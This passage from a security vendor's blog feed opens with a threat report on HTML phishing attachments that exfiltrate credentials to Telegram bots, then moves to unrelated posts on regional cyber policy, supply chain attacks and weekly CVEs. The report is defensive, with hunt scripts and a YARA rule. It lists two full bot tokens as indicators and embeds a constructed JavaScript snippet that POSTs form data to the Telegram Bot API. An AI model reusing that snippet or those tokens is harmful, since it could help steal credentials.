  • Anti-forensics measures block F12, Ctrl+U/S/C/A/X, Ctrl+Shift+I, the right-click context menu, text selection (selectstart), and drag events, preventing victims and analysts from inspecting the code, viewing the source, copying content, or extracting assets. Meanwhile, the sendData() function exfiltrates the email and password to the Telegram Bot API (api.telegram.org/bot) via a POST request carrying a chat_id parameter, bypassing traditional server-based C2 infrastructure (see Figure 5).

Figure 5: Anti-forensics Implementation to disable key combinations and functions

Both samples share core functionality as shown in Figure 6.

Figure 6: Telegram Exfiltration Function

Telegram Bot Intelligence:

An analysis of the campaign infrastructure uncovers a decentralized network of Telegram bots operated by multiple threat actors.

Multiple active bot tokens were identified and confirmed in the ecosystem, each showing distinct, and in some cases unique, operational behavior.

  • Bot Naming Conventions: garclogtools_bot, v8one_bot, thatboi_bot, dollsman_bot, davhapbot, clockwise47_bot
  • Operator Profiles: Recipients include accounts with usernames like Rharfel, joedollar23telegram, Shorelight, coded404, marie_jane_01
  • Infrastructure Reuse: Bot token 7447553175:AAF2ifSM0-b7OiF-E4ZzqeDVthDALq-IexQ appears across multiple FedEx-themed samples, bot token 8155473646:AAEZzrw4q_ZZws1J8mJOcqFix9bAnFYeFlo observed across multiple Adobe and WeTransfer-themed samples.

Scale & actor behaviour:

Recent research conducted over the past month has identified many distinct HTML samples in circulation, suggesting broad reuse or automation. The templates and user interface components are consistent, including Adobe-style branding, blurred invoice backgrounds, and centered modal elements, indicating the use of a toolkit or an automated generator (see Figure 7).

Figure 7: Usage of the same blurred image as background across multiple themed targets

Geographic targeting

Based on our threat intelligence analysis, the campaign primarily targets organizations across Central and Eastern Europe, with heavy concentration in the Czech Republic, Slovakia, Hungary, and Germany.

The attackers distribute phishing emails posing as legitimate customers or business partners, requesting quotations or invoice confirmations. This regional focus is evident through targeted recipient domains belonging to local enterprises, distributors, government-linked entities, and hospitality firms that routinely process RFQs and supplier communications.

Identified targeted industries include:

  • Agriculture & Livestock
  • Automotive
  • Construction
  • Consumer Goods
  • Education
  • Energy & Utilities
  • Government & LEA
  • Hospitality
  • IT & ITES
  • Manufacturing
  • Media & Entertainment
  • Professional Services
  • Retail
  • Telecommunications
  • Technology

Brand Impersonation Strategy

The threat actors employ a sophisticated multi-brand approach tailored to regional preferences and business contexts.

The brands leveraged by this campaign are as follows:

Global Brands (see Figure 8)

  • Adobe (PDF/Document viewers)
  • Microsoft (Excel, Outlook, Generic login)
  • WeTransfer (File sharing)
  • DocuSign (Electronic Digital Signature Platform)

Figure 8: Global Technology Themed Brands

Logistics/Shipping brands (see Figure 9)

  • FedEx (international shipping)
  • DHL (regional and international delivery)

Figure 9: Logistics and Transportation Themed Brands

Regional Service brands (see Figure 10)

  • Telekom Deutschland/T-Mobile (German telecommunications)
  • Roundcube (open-source webmail popular in Europe)
  • Generic corporate portals customized per region

Figure 10: Regional and Generic Themed Brands

The campaign is likely designed to mimic common B2B communication in the sectors mentioned above. For Central European targets, the threat actor employs RFQ-style subject lines and procurement terminology. For broader audiences, they emphasize themes like document sharing and shipping notifications.

This dual strategy, which merges regional business email styles with globally recognized brand impersonation, enhances success rates across diverse organizational cultures and security awareness levels.

The modular template system enables quick deployment of new brand variants, suggesting that additional brands not listed could also be in circulation. The presence of German-language Telekom variants and Spanish-language sales department targeting shows the campaign's ability to tailor branding and language for specific regional markets.

Campaign Evolution

The technical variations between samples indicate ongoing development:

  • Obfuscation progression: From plain JavaScript to AES encryption
  • Anti-analysis enhancement: Addition of keyboard/mouse event blocking
  • UI sophistication: Evolution from basic forms to polished, brand-authentic interfaces
  • API modernization: Migration from jQuery $.ajax to native Fetch API
  • Language expansion: English-only to multi-language support, including German, Korean, and Spanish

In addition to this, we also identified the following:

  • Conditional Execution: Telegram exfiltration only triggers upon actual credential entry, avoiding detection in automated sandboxes
  • CDN Abuse: Leverages legitimate services (CloudFront, Cloudflare) to blend with normal traffic
  • Domain Masquerading: References to trusted domains enhance legitimacy

Conclusion

A sophisticated credential-harvesting attack that is also scalable poses a potent threat. This campaign attempts to circumvent traditional security measures by using HTML attachments. Impersonating trusted brands, targeting specific audiences, and using Telegram for data exfiltration pose a low-cost yet high-impact threat to organizations worldwide.

As obfuscation techniques and anti-analysis tactics evolve, SOC countermeasures are likewise continuing to develop and improve. Organizations should prioritize deploying HTML attachment controls and blocking the Telegram API as key components of their security strategy, while also enhancing overall email security to provide long-term protection.

The scale of this operation, with multiple samples of different themes across different industries and multiple active bots, suggests a significant ongoing compromise of business credentials. Security teams should conduct retroactive threat hunts for the identified indicators and assume potential account compromises for any users who may have interacted with these attachments.

Our Recommendations:

For end users:

  • Do not open unsolicited HTML attachments. If you must view an attachment, open it in a secure, sandboxed environment or convert it to PDF using a trusted service.
  • Treat any prompt asking to re-enter credentials on top of an attachment/document with caution.

For SOCs/Defenders:

  • Hunt for api.telegram.org POST activity from clients that wouldn’t normally call the Telegram Bot API.
  • Monitor connections to third-party services, including api.ipify.org, ip-api.com, image conversion/sharing services (e.g., pngtoico.io, imgur.com), and fake login domains.
  • Add content inspection for attachments: flag HTML attachments containing fetch() or XMLHttpRequest calls that reference telegram.org or other public C2 endpoints.
  • Block or proxy direct traffic to the Telegram Bot API for endpoints that should not require it. Where blocking is not possible, inspect payloads for potential credentials.
  • Implement attachment handling policies: block or sandbox .html attachments.
  • Treat .html/.htm/.shtml attachments as high-risk file types requiring additional scrutiny. Implement content inspection for all HTML-based attachments before delivery to end users.
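One way to run the first two hunts above over proxy logs, as an added example that is not Cyble's tooling. It goes one step past the bullet list by correlating the two behaviours seen in Sample 1: a public IP lookup (api.ipify.org or ip-api.com) followed shortly by a POST to the Telegram Bot API from the same client. The log format, the client addresses and the bot token are constructed for this example; the allowlist of clients permitted to use the Bot API and the 10-minute lookback are assumptions.

```python
"""Hunt proxy logs for clients posting to the Telegram Bot API.

Added example, not Cyble's tooling. Assumptions: a simplified log format
"<ISO timestamp> <client IP> <method> <host> <path>", an empty allowlist of
clients permitted to use the Bot API, and a 10-minute lookback for the
IP-lookup-then-exfiltration correlation seen in Sample 1 of the report.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

TELEGRAM_HOST = "api.telegram.org"
# Public IP lookup services the samples called before exfiltrating.
IP_LOOKUP_HOSTS = {"api.ipify.org", "ip-api.com"}
# /bot<8-10 digit id>:<35-char secret>/sendMessage
BOT_SEND_PATH = re.compile(r"^/bot[0-9]{8,10}:[A-Za-z0-9_-]{35}/sendMessage")
# Clients that legitimately call the Bot API (assumption: maintained by the SOC).
ALLOWED_TELEGRAM_CLIENTS = set()

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT|CONNECT) (\S+) (\S+)$")

# Constructed token and log lines: 10.0.0.23 shows the full pattern,
# 10.0.0.88 only the Telegram POST, 10.0.0.57 is benign.
FAKE_TOKEN = "1234567890:AA" + "x" * 33
SAMPLE_LOG = f"""\
2025-11-05T09:14:02Z 10.0.0.23 GET api.ipify.org /?format=json
2025-11-05T09:14:03Z 10.0.0.23 GET ip-api.com /json/
2025-11-05T09:14:41Z 10.0.0.23 POST api.telegram.org /bot{FAKE_TOKEN}/sendMessage
2025-11-05T09:15:10Z 10.0.0.57 GET www.adobe.com /
2025-11-05T11:02:00Z 10.0.0.88 POST api.telegram.org /bot{FAKE_TOKEN}/sendMessage
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, host, path = m.groups()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "client": client,
        "method": method,
        "host": host,
        "path": path,
    }


def hunt(log_text, lookback=timedelta(minutes=10)):
    """Return findings for non-allowlisted clients that POST to the Bot API.

    Severity is raised to "high" when the same client queried a public IP
    lookup service within `lookback` before the POST.
    """
    by_client = defaultdict(list)
    for event in filter(None, map(parse_line, log_text.splitlines())):
        by_client[event["client"]].append(event)

    findings = []
    for client, events in by_client.items():
        if client in ALLOWED_TELEGRAM_CLIENTS:
            continue
        for ev in events:
            if not (ev["method"] == "POST" and ev["host"] == TELEGRAM_HOST
                    and BOT_SEND_PATH.match(ev["path"])):
                continue
            reasons = ["POST to Telegram Bot API sendMessage from non-allowlisted client"]
            severity = "medium"
            lookups = sorted({
                e["host"] for e in events
                if e["host"] in IP_LOOKUP_HOSTS and ev["ts"] - lookback <= e["ts"] < ev["ts"]
            })
            if lookups:
                reasons.append("public IP lookup via %s shortly before the POST" % ", ".join(lookups))
                severity = "high"
            findings.append({
                "client": client,
                "time": ev["ts"].isoformat(),
                "severity": severity,
                "reasons": reasons,
            })
    return sorted(findings, key=lambda f: f["time"])


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding["severity"].upper(), finding["client"], finding["time"],
              "; ".join(finding["reasons"]))
```

Replace parse_line() with a parser for your proxy's real format and populate ALLOWED_TELEGRAM_CLIENTS with any hosts that are supposed to talk to the Bot API; everything else that matches is a candidate for the retroactive hunt described in the conclusion.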

MITRE ATT&CK® Techniques

Tactic | Technique (ID) | Procedure
Initial Access (TA0027) | Phishing: Spearphishing Attachment (T1566.001) | Delivered via targeted email attachments
Execution (TA0041) | User Execution: Malicious File (T1204.002) | Execution occurs when the user opens or runs a malicious file disguised as legitimate software or documents.
Credential Access (TA0006) | Input Capture via Web Form (T1056.003) | Captures user credentials and other sensitive information entered in web forms.
Exfiltration (TA0010) | Exfiltration Over Web Service: Telegram API (T1567.002) | Sends stolen data via Telegram API.
Defense Evasion (TA0030) | Obfuscated/Encrypted File (T1027) | Uses code obfuscation/encrypted files

Indicators of compromise (IoCs)

The IOCs have been added to this GitHub repository. Please review and integrate them into your Threat Intelligence feed to enhance protection and improve your overall security posture.

Static indicators (from analysed samples):

  • Attachment file names: patterns like RFQ_*, INQUIRY.html, Quotation.html (varies by sample).
  • Hard-coded Telegram bot tokens and chat IDs inside the HTML/JS.
  • Use of https[:]//api.telegram.org/bot endpoint in JavaScript.
  • HTML that loads a blurred background invoice image and a modal overlay with Adobe branding.

Detection opportunities

Yara rule

rule HTML_Telegram_Credential_Phishing
{
    meta:
        description = "Detects HTML-based Telegram credential phishing attempts that invoke the Telegram bot API to exfiltrate credentials"
        author = "Cyble Research Labs"
        date = "2025-11-04"
        tlp = "AMBER"
        severity = "critical"

    strings:
        $a = "api.telegram.org/bot"
        $b = "/sendMessage"
        $c = "type=\"password\""
        $d = "preventDefault()"
        // Bot token: 9-10 digit bot id, a colon, then a 35-character secret that
        // begins with "AA" (33 further characters), the shape of the tokens listed
        // under Infrastructure Reuse above
        $e = /[0-9]{9,10}:AA[A-Za-z0-9_-]{33}/
        $f = "api.ipify.org"
        $g = "Quotation Request"
        $h = "Invoice "

    condition:
        all of ($a, $b, $c, $d) and any of ($e, $f, $g, $h)
}
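A Python equivalent of the rule above, as an added example that is not part of the original post, for mail gateways or sandboxes that cannot run YARA. It also pulls the hard-coded bot token and chat_id out of a matching attachment so they can be blocked and reported. The two sample attachments are constructed, contain only the markers the rule keys on rather than a working page, and use an obviously fake token and chat_id.

```python
"""Python equivalent of the YARA rule above, plus IoC extraction.

Added example, not Cyble's code. Scans the raw text of an .html attachment.
The sample inputs are constructed and contain only the markers the rule
keys on; the bot token and chat_id in them are fake.
"""
import re

# Strings that must all be present (the rule's $a-$d).
REQUIRED = [
    "api.telegram.org/bot",
    "/sendMessage",
    'type="password"',
    "preventDefault()",
]
# Supporting strings, any one of which suffices alongside the REQUIRED set ($f-$h).
SUPPORTING = ["api.ipify.org", "Quotation Request", "Invoice "]
# Bot token ($e): 8-10 digit bot id, colon, 35-char secret starting "AA",
# the shape of the tokens listed in the report.
TOKEN_RE = re.compile(r"(?<![0-9])([0-9]{8,10}:AA[A-Za-z0-9_-]{33})(?![A-Za-z0-9_-])")
# chat_id as a JS property, query parameter or assignment.
CHAT_ID_RE = re.compile(r"chat_id\s*[:=]\s*['\"]?(-?[0-9]{5,15})")


def matches_rule(html):
    """True when all REQUIRED markers are present and a token or SUPPORTING string is too."""
    if not all(s in html for s in REQUIRED):
        return False
    return bool(TOKEN_RE.search(html)) or any(s in html for s in SUPPORTING)


def extract_iocs(html):
    """Pull hard-coded bot tokens and chat IDs out of the attachment for blocking/reporting."""
    return {
        "bot_tokens": sorted(set(TOKEN_RE.findall(html))),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(html))),
    }


def scan(html):
    """Verdict plus IoCs for one attachment."""
    return {"suspicious": matches_rule(html), **extract_iocs(html)}


# Constructed samples; the token secret is a placeholder run of "x" characters.
FAKE_TOKEN = "1234567890:AA" + "x" * 33
PHISH_SAMPLE = f"""<input type="password" name="pwd">
<script>
form.addEventListener("submit", function (e) {{
  e.preventDefault();
  fetch("https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage", {{
    method: "POST",
    body: JSON.stringify({{chat_id: "123456789", text: "constructed"}}),
  }});
}});
</script>"""
BENIGN_SAMPLE = """<form><input type="password" name="pwd"></form>
<script>form.addEventListener("submit", function (e) { e.preventDefault(); });</script>"""


if __name__ == "__main__":
    for name, sample in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan(sample))
```

The benign sample has a password field and a preventDefault() call, which is why the rule requires all four of $a-$d together: a login form alone is not a signal, the combination with the Bot API endpoint is.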

Australia Strengthens Regional Cyber Partnerships to Bolster Security Across the Asia-Pacific  https://cyble.com/blog/australia-asia-pacific-cybersecurity-partnerships/ Fri, 07 Nov 2025 13:11:49 +0000 https://cyble.com/?p=104600 Germany

Australia is advancing a collaborative approach to cybersecurity across the Asia-Pacific, with key leadership from Stephanie Crowe, Head of the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), and Jessica Hunter, the nation’s newly appointed Ambassador for Cyber Affairs and Critical Technology.

Together, they are spearheading initiatives to enhance cyber resilience, share threat intelligence, and build technical capacity among regional partners through frameworks such as the Pacific Cyber Security Operations Network (PaCSON) and the Asia Pacific Computer Emergency Response Team (APCERT).  

A Collaborative Vision for Regional Cybersecurity 

Speaking on their shared mission, Crowe and Hunter outlined how their respective portfolios intersect to reinforce cybersecurity within the Asia-Pacific. 

“Hi, I’m Stephanie Crowe, Head of the Australian Cyber Security Centre at the Australian Signals Directorate,” Crowe began, introducing her role. 

“And I’m Jessica Hunter, Ambassador for Cyber Affairs and Critical Technology at the Department of Foreign Affairs and Trade,” added Hunter. “We work together to strengthen cybersecurity within the Asia-Pacific region.” 

Hunter explained that her role as Ambassador for Cyber Affairs and Critical Technology involves leading Australia’s international engagement in cyberspace and advancing national interests in emerging technologies. “I do this through building cyber capacity, uplifting crisis response practices, and increasing resilience across our region,” she said. 

Crowe described how the ACSC provides technical expertise and operational support. “Through the Australian Cyber Security Centre, the ASD shares cyber threat intelligence and supports capacity-building activities in Australia and with our neighbours in the Asia-Pacific,” she noted. 

Aligning with the Australian Cyber Security Strategy 

Both leaders noted that their work underpins the Australian Cyber Security Strategy, which prioritizes international cooperation as a mechanism for strengthening collective resilience.

“International collaboration gives us the best opportunity to leverage capability, expertise, partnerships, and threat visibility,” Crowe said. “By doing so, we can help our region uplift its cybersecurity and boost its capability.” 

Hunter added that cyberspace “is truly borderless,” requiring nations to work closely across the Pacific and beyond to ensure shared protection. “Cyber and critical technology affect all aspects of international relations,” she explained. “They underpin national security, the realization of human rights and freedoms, global economic prosperity, sustainable development, and international stability.” 

The $83.5 Million Cyber Program Commitment 

Australia’s efforts are supported through the Cyber and Critical Technology Cooperation Program, a federal initiative valued at $83.5 million. The program provides rapid assistance for digital incident response and long-term resilience building, particularly in Pacific and Southeast Asian nations. 

“This program reflects our commitment to supporting the resilience of our closest partners,” Hunter said. “It delivers on SHIELD Six of the Australian Government’s Cyber Security Strategy by strengthening international cooperation and preparedness.” 

Strengthening Regional Networks: PaCSON and APCERT 

A major component of Australia’s regional engagement is its leadership role within PaCSON and APCERT, two cornerstone networks facilitating operational collaboration across the Asia-Pacific. 

The Pacific Cyber Security Operations Network (PaCSON) unites cybersecurity and incident response experts from government agencies across the Pacific. It provides a structured way for countries to share information, coordinate incident responses, and develop consistent practices for managing cyber threats.

Similarly, the Asia Pacific Computer Emergency Response Team (APCERT) connects cybersecurity teams throughout the wider region, promoting best practices and mutual support in the face of emerging digital risks. 

“By uplifting our cyber defences together, we are better positioned to respond collectively to cyber incidents,” Crowe said. “This work strengthens Australia and places the region in a better position to face evolving cyber challenges.” 

Information Sharing and Regional Resilience 

The ACSC uses intelligence gathered from incidents within Australia to inform its engagement with Pacific partners. This includes issuing alerts, publishing technical advisories, and sharing best-practice resources through the national platform cyber.gov.au, which provides materials in more than 25 languages. 

According to Crowe, this approach ensures that lessons learned domestically can directly benefit regional counterparts. “The ASD and ACSC’s advice helps to inform discussions and negotiations with our partners around cybersecurity awareness and uplift,” she said. 

Hunter underscored that such collaboration is essential in a rapidly evolving threat landscape. “A complex and evolving threat environment means that we need each other,” she stated. “No country can face these challenges alone.” 

Both leaders reiterated that cooperation among like-minded nations is critical to maintaining global trust and accountability. “We continue to join with international partners to uphold international law and impose costs on malicious actors that make cyberspace less safe,” Hunter said. “Collectively, we can strengthen our nations and our region’s cyber resilience by working together to share knowledge, resources, and best practices.” 

South Africa Launches Pilot for Secure Data Exchange Among Government Agencies  https://cyble.com/blog/mzansixchange-data-exchange-in-south-africa/ Wed, 05 Nov 2025 14:16:38 +0000 https://cyble.com/?p=104205 Germany

South Africa took a major step toward modernizing governance and service delivery with the launch of MzansiXchange, a pilot project designed to enable secure and structured data exchange across government departments. The initiative, led by the National Treasury, allows public institutions to work more efficiently, using shared data to inform decisions and deliver better services. 

The MzansiXchange initiative aims to overcome long-standing challenges in South Africa’s public sector, including fragmented data systems, departmental silos, and limited interoperability. Rather than functioning as a single data repository, it acts as what National Treasury Director-General Dr Duncan Pieterse calls a “secure bridge” for data exchange between authorized government entities. 

“MzansiXchange is not a central data repository. It does not store any data,” Dr Pieterse explained at the pilot launch. “Instead, it acts as a structured and governed exchange that allows departments to retain ownership of their data while sharing it securely with other authorized entities when needed.” 

The Roadmap for Digital Transformation 

MzansiXchange forms one of the four pillars of the Roadmap for the Digital Transformation of Government, officially launched in May 2025. The other three pillars, digital identity, digital payments, and digital services, together form the foundation of South Africa’s digital public infrastructure. 

According to Dr Pieterse, the roadmap represents a joint effort between the National Treasury, the Presidency, and several other government departments as part of Operation Vulindlela Phase II. Its goal is to modernize public administration, enhance data-driven decision-making, and improve coordination across state institutions. 

Each pillar supports the others: while MzansiXchange focuses on data exchange, the MyMzansi initiative, the broader digital entry point for citizens, will integrate identity, payments, and service access into a unified platform. Together, they aim to create a government ecosystem that is more transparent, efficient, and responsive to public needs. 

Four Components of the MzansiXchange Platform 

The MzansiXchange pilot introduces four main components designed to meet different data-sharing needs within government: 

  1. Regulation, Compliance, and Verification: Provides authorized entities with real-time access to identifiable data for verification and compliance purposes.

  2. Policy, Planning, and Research: Facilitates the bulk sharing of de-identified data for evidence-based policymaking and research.

  3. Operational Analytics: Enables departments to transfer both de-identified and identifiable data to support day-to-day service delivery.

  4. Open Access Data: Offers the public access to aggregated datasets, dashboards, and catalogues through secure digital channels.

These components are underpinned by strict governance frameworks, standardized data protocols, and legal instruments such as Memoranda of Understanding (MoUs) and Service Level Agreements (SLAs). This ensures that all data exchange within the system remains compliant, transparent, and secure. 

Building on a Foundation of Secure Data Use 

MzansiXchange builds on existing National Treasury projects such as the National Treasury Secure Data Facility (NT-SDF) and Spatial Economic Activity Data South Africa (SEAD-SA). These initiatives have already demonstrated the benefits of using anonymized administrative data to inform policy and planning. 

For over a decade, the NT-SDF has handled anonymized tax records for policy analysis and program evaluation, including assessments of firm-level productivity and government incentives. The spatialized tax data generated through this work enables provinces and municipalities to understand local economic trends and allocate resources more effectively. 

Dr Pieterse highlighted that South Africa is one of the few countries globally to make such micro-level administrative data available for research, underscoring the nation’s commitment to transparency and innovation. Lessons from these projects, including those related to system security, collaboration, and trust, have directly informed the design and governance of MzansiXchange.

Learning from Global Examples 

While tailored to South Africa’s specific needs, MzansiXchange draws inspiration from successful international models. The National Treasury team consulted countries such as Estonia, India, Benin, Kazakhstan, and the Dominican Republic, all of which have implemented national data exchange frameworks. 

Brazil, for example, estimated savings of more than R4 billion in 2023 through its national data exchange infrastructure, highlighting the potential economic impact of secure and interoperable digital systems. 

The pilot phase of MzansiXchange, which will run for one year, is being implemented in collaboration with multiple departments and research institutions. Participants include Statistics South Africa, the Department of Home Affairs, the Department of Basic Education, the Department of Agriculture, Land Reform and Rural Development, the South African Revenue Service, and the South African Social Security Agency, among others. 

The project also benefits from the technical expertise of Open Cities Lab and the support of international development partners such as the State Secretariat for Economic Affairs (SECO), the UK Foreign, Commonwealth and Development Office (FCDO), and the Gates Foundation. 

A Platform for Transformation 

At the launch event, Dr Pieterse described MzansiXchange as a “platform for collaboration, innovation, and transformation,” emphasizing that its success depends on collective commitment. 

“MzansiXchange is a national commitment to harnessing data for the public good,” he said. “Its success depends on how each department integrates and fully leverages its potential. To succeed, we must build trust — between departments, in the system, and with the public.” 

MzansiXchange’s architecture, built using X-Road technology, provides flexibility and resilience while supporting harmonized standards and long-term sustainability. It is designed to evolve as South Africa’s digital ecosystem matures, ultimately enabling a more connected and data-smart government. 

Software Supply Chain Attacks Surge to Record High in October 2025 https://cyble.com/blog/record-surge-in-software-supply-chain-attacks/ Tue, 04 Nov 2025 13:01:07 +0000 https://cyble.com/?p=104043 supply chain attacks

Software supply chain attacks hit a new record in October that was more than 30% higher than the previous record set in April 2025. 

Cyble’s data – based on attacks claimed by threat actors on dark web data leak sites – shows that threat actors claimed 41 supply chain attacks in October, 10 more than the previous high seen in April.

Supply chain attacks have remained elevated since April, averaging more than 28 a month since then, a rate that is more than twice as high as the 13 attacks per month seen between early 2024 and March 2025 (chart below). 

A combination of critical and zero-day IT vulnerabilities and threat actors actively targeting SaaS and IT service providers have been the primary drivers of the recent surge in supply chain attacks, and the sustained increase suggests that the risk of supply chain attacks may remain elevated going forward. Cloud security threats and AI-based phishing campaigns have also played a role in the growing number of supply chain incidents. 

Every one of the 24 sectors tracked by Cyble has been hit by a supply chain incident this year. Because of the rich target they represent and their downstream customer reach, IT and IT services companies have been by far the most targeted, with 107 supply chain attacks so far this year. Financial services, transportation, technology, and government have also been hit with much greater than average frequency (chart below). 

Recent Significant Supply Chain Attacks 

Qilin and Akira have been the top two ransomware groups in 2025, and both have also claimed an above-average share of supply chain attacks. 

Akira recently claimed responsibility for a cyberattack targeting a major open-source software project. The group claims to possess 23GB of data, including sensitive employee information as well as financial documents, internal confidential files, and reports related to software issues and internal operations. 

Akira also claimed multiple attacks on IT service providers, including a company that develops software solutions for government and law enforcement agencies, a provider of compliance and environmental data management software for industrial and energy clients, and a U.S.-based company providing IT, cybersecurity, and consulting solutions for government, intelligence, and defense sectors. In the latter case, the group claims to possess more than 19GB of data, including financial records, sensitive employee and customer data, confidential documents, NDAs, and other files containing personal and corporate data. 

Qilin claimed responsibility for breaching a U.S.-based financial technology company that provides integrated software and services for payment processing, transaction management, and financial infrastructure solutions. Stolen data allegedly includes confidential hardening reports, internal SharePoint directories, and a list of IT infrastructure employees from a major financial services company. 

Qilin also claimed an attack on a U.S.-based company providing technology solutions for law enforcement, criminal justice, public safety, and security sector, and source code for proprietary software products was among the allegedly stolen data, in addition to accounting and HR data and client payment information from various law enforcement agencies. 

Qilin claimed attacks on three U.S. energy cooperatives, including the theft of project information, obsolescence equipment details, contractual agreements with U.S. government entities, and customer billing information. 

Another claimed Qilin breach involved a U.S.-based cybersecurity and cloud services provider offering IT infrastructure, managed services, and compliance solutions for healthcare and dental organizations. The threat actors claimed they gained access to downstream customer environments through clear-text credentials stored in Word and Excel documents hosted on the company’s systems. The stolen data reportedly includes customers’ personal information, financial records, and medical documentation. Posted samples include unencrypted passwords from client systems, financial documents, and medical reports. 

A newly identified ransomware group, Kyber, leaked data allegedly stolen from a major U.S.-based defense and aerospace contractor that provides communication, surveillance, and electronic warfare systems. The group leaked over 141GB of data consisting of project files, internal builds, databases, and backup archives. 

The BlackShrantac hacking group claimed responsibility for a breach of a South Korean cybersecurity and physical security services provider. According to the hacking group, approximately 24GB of data was stolen, containing customer information and requirements, network and infrastructure data, HR and payroll data, e-commerce information, and cybersecurity technical documentation, including website source code, API keys, and configuration files. To substantiate their claims, BlackShrantac released several sample files, which appear to show access to internal documentation, technical blueprints, Excel sheets with configuration details, and other sensitive company data. 

The Cl0p ransomware group claimed several victims from its exploitation of Oracle E-Business Suite vulnerabilities, including a major global energy technology company and a major U.S. university. 

The threat group Crimson Collective claimed to have compromised a GitLab instance of a major U.S. technology provider, including the theft of 800 Customer Engagement Reports. The threat actors allegedly gained access to a client infrastructure using credentials and tokens found within the stolen repositories. 

Protecting Against Supply Chain Attacks 

Protecting against software supply chain attacks can be challenging because partners and suppliers are, by nature, trusted, but security audits and third-party risk assessments should become standard cybersecurity practices. 

Organizations should also build in controls and resilience wherever possible to limit the extent of any attacks. Such controls include: 

  • Network microsegmentation 

  • Strong access controls, allowing no more access than is required, with frequent verification 

  • A strong source of user identity and authentication, including multi-factor authentication and biometrics, and machine authentication with device compliance and health checks 

  • Encryption of data at rest and in transit 

  • Ransomware-resistant backups that are immutable, air-gapped, and isolated as much as possible  

  • Honeypots that lure attackers to fake assets for early breach detection 

  • Proper configuration of API and cloud service connections 

  • Monitoring for unusual activity with SIEM, Active Directory monitoring, and data loss prevention (DLP) tools 

  • Routinely assessing and confirming controls through audits, vulnerability scanning, and penetration tests 

The most effective place to control software supply chain risks is in the continuous integration and continuous delivery (CI/CD) process, so carefully vetting partners and suppliers and requiring good security controls in contracts are essential for improving third-party security. Services like Cyble’s third-party risk intelligence can help you get started on this process. By making security a buying criterion, organizations encourage vendors to respond with better security controls and documentation. 

The post Software Supply Chain Attacks Surge to Record High in October 2025 appeared first on Cyble.

The Week in Vulnerabilities: Cyble Urges Apache, Microsoft Fixes https://cyble.com/blog/cyble-weekly-vulnerability-report-3/ Mon, 03 Nov 2025 13:07:59 +0000 https://cyble.com/?p=103966 Germany

Cyble Vulnerability Intelligence researchers tracked 1,128 vulnerabilities in the last week, of which more than 138 already have a publicly available Proof-of-Concept (PoC), significantly raising the chances of real-world attacks. 

A total of 67 vulnerabilities were rated as critical under the CVSS v3.1 scoring system, while 22 received a critical severity rating based on the newer CVSS v4.0 scoring system. 

Here are some of the IT and ICS vulnerabilities flagged by Cyble threat intelligence researchers in recent reports to clients. 

The Week’s Top IT Vulnerabilities 

CVE-2025-55754 is an Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Successful exploitation could potentially lead to indirect administrative command execution through console manipulation, risking system integrity and confidentiality if administrators are tricked into executing malicious commands. 

CVE-2025-59287 continues to attract the interest of threat actors on underground forums monitored by Cyble, and last week CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and issued a separate alert on the Microsoft out-of-band security update. The critical remote code execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS) could allow unauthenticated attackers to execute arbitrary code remotely by exploiting publicly accessible WSUS servers on default TCP ports, potentially enabling lateral movement within enterprise environments. 

Other vulnerabilities added to the CISA KEV catalog in the last week include: 

  • CVE-2025-54236, also known as "SessionReaper," is a critical vulnerability affecting Adobe Commerce and Magento Open Source platforms. The flaw stems from improper input validation in the Commerce REST API, potentially allowing remote unauthenticated attackers to hijack customer accounts and, under some configurations, achieve remote code execution (RCE). 

  • CVE-2025-41244, a local privilege escalation vulnerability affecting VMware Aria Operations and VMware Tools. A local threat actor with non-administrative privileges, with access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled, could potentially exploit the vulnerability to escalate privileges to root on the same VM. 

  • CVE-2025-24893, a code injection vulnerability affecting the XWiki Platform. Any guest can perform arbitrary remote code execution through a request to ‘SolrSearch,’ impacting the confidentiality, integrity, and availability of the entire XWiki installation. Cyble first detected attack attempts on the vulnerability in March. 

One of the week’s highest-rated vulnerabilities is, fortunately, one that was fixed for users. CVE-2025-59503 is a 9.9-rated Server-Side Request Forgery (SSRF) vulnerability affecting the Microsoft Azure Compute Resource Provider, specifically the Azure Compute Gallery, that could have allowed an authorized attacker to perform SSRF attacks. The issue has been fixed by Microsoft, which had not detected any attacks on the vulnerability as of the time of publication. 

CVE-2025-55315 is generating significant interest in open-source communities. The 9.9-rated vulnerability in ASP.NET Core, specifically in the Kestrel web server component, involves an inconsistent interpretation of HTTP requests, leading to HTTP request/response smuggling. This flaw could allow an authorized attacker to bypass security features over a network by smuggling an extra HTTP request inside another, potentially enabling actions that would normally require authentication. 

Vulnerabilities Under Discussion on Underground Forums 

Cyble dark web researchers observed threat actors on the dark web and underground forums discussing weaponizing multiple vulnerabilities. They include: 

CVE-2025-61984: A vulnerability in OpenSSH (versions prior to 10.1) related to command injection via the ProxyCommand feature when an attacker is able to supply a specially crafted username containing control characters (such as a newline followed by a payload). This could lead to remote code execution on the client system in a specific scenario. 

CVE-2025-40778: A high-severity vulnerability affecting BIND 9 DNS resolvers, widely used open-source DNS software. The flaw arises because BIND 9 is too lenient under certain conditions when accepting records in DNS responses, potentially allowing remote, unauthenticated attackers to inject forged DNS records into the resolver's cache via cache poisoning attacks. This could enable attackers to redirect Internet traffic to malicious sites, distribute malware, intercept network traffic, or disrupt services by supplying attacker-controlled DNS responses. 

CVE-2025-30247: A critical OS command injection vulnerability affecting Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms. The vulnerability could allow remote attackers to execute arbitrary system commands via a specially crafted HTTP POST request to the device's web interface, without requiring authentication or user interaction. 

